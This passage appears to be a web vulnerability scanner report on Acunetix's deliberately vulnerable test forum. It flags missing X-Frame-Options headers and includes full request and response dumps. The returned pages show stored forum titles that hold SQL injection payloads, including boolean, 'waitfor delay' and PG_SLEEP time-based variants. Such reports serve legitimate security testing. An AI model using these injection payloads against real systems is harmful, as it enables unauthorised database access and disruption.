</div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3*2<(0+5+781-781) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=46 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=46 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3136 |
Response Body - size: 3,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3*2>(0+5+781-781) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3*2>(0+5+781-781) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3*2>(0+5+781-781) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=47 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=47 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3136 |
Response Body - size: 3,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1 waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1 waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1 waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=48 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=48 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3163 |
Response Body - size: 3,163 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum UGrs47CJ'; waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/UGrs47CJ'; waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>UGrs47CJ'; waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=49 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=49 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3166 |
Response Body - size: 3,166 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum KHr20UMM'); waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/KHr20UMM'); waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>KHr20UMM'); waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3071 |
Response Body - size: 3,071 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>showforum.asp/.</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=50 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=50 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3169 |
Response Body - size: 3,169 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum NebDWBkM')); waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/NebDWBkM')); waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:56 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>NebDWBkM')); waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=51 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=51 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3199 |
Response Body - size: 3,199 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:56 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=52 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=52 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3202 |
Response Body - size: 3,202 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a 